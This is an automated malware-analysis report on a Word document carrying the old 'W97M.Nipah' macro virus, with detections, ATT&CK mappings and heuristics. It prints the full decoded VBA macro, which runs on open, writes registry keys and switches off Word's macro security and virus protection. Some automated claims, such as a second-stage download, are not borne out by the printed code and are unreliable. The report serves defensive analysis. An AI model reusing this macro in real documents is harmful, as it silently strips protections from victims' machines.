MALICIOUS
368
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1137.005 DLL Search Order Hijacking
T1059.001 PowerShell
The sample contains a VBA macro that executes upon opening the document, as indicated by the 'Document_Open' subroutine and 'OLE_VBA_DOCOPEN' heuristic. This macro utilizes 'WScript.Shell' to write several registry keys, including persistence-related entries like 'HKEY_CURRENT_USER\SOFTWARE\Nipah\Infection'. The 'OLE_VBA_SHELL' and 'OLE_VBA_WSCRIPT' heuristics confirm the use of shell execution and WScript.Shell, suggesting the macro's intent is to download and execute a second-stage payload or establish persistence. The ClamAV detections 'Win.Trojan.Psycho-3' and 'Doc.Trojan.Emelia-1' further support its malicious nature.
Heuristics 8
-
ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Psycho-3
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set WshShell = CreateObject("WScript.Shell") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set WshShell = CreateObject("WScript.Shell") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
'====================================================== Private Sub Document_Open() On Error Resume Next -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Clipboard command execution lure high SE_CLIPBOARD_COMMAND_LUREDocument tells the user to copy or paste clipboard content into Run, PowerShell, cmd, or another shell-like execution context
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1605 bytes |
SHA-256: a9b4000e9ce2358cddac217569c84230e5a84c7d19669bf7f28e87de7b376552 |
|||
|
Detection
ClamAV:
Doc.Trojan.Emelia-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Nipah"
'======================================================
' W97M.Nipah by Dr Virus Quest
' Origin from Malaysia
' Copyright©1999
'======================================================
Private Sub Document_Open()
On Error Resume Next
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Nipah\Infection", 0, "Nipah"
WshShell.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Infection\Nipah", 0, "Nipah"
WshShell.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Nipah", 0, "Nipah"
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Nipah\VirusName", "Nipah"
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Nipah\Creator", "Dr Virus Quest"
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Nipah\Created", "09051999"
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Nipah\Country", "Malaysia"
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.